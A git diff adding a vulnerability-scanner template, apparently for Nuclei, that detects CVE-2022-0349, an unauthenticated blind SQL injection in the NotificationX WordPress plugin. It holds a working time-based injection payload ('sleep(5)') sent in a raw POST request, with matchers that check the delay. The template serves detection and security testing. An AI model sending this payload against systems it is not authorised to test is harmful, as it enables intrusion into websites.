diff --git a/cves/2022/CVE-2022-0349.yaml b/cves/2022/CVE-2022-0349.yaml new file mode 100644 index 0000000000..2a246adf43 --- /dev/null +++ b/cves/2022/CVE-2022-0349.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-0349 + +info: + name: NotificationX WordPress plugin < 2.3.9 - SQL Injection + author: edoardottt + severity: critical + description: | + The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection. + reference: + - https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a + - https://nvd.nist.gov/vuln/detail/CVE-2022-0349 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0349 + classification: + cve-id: CVE-2022-0349 + tags: cve,notificationx,wordpress,wordpressplugin,sqli + +requests: + - raw: + - | + POST /?rest_route=/notificationx/v1/analytics HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nx_id%3Dsleep(5)%20--%20x + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=5' + + - type: status + status: + - 200 \ No newline at end of file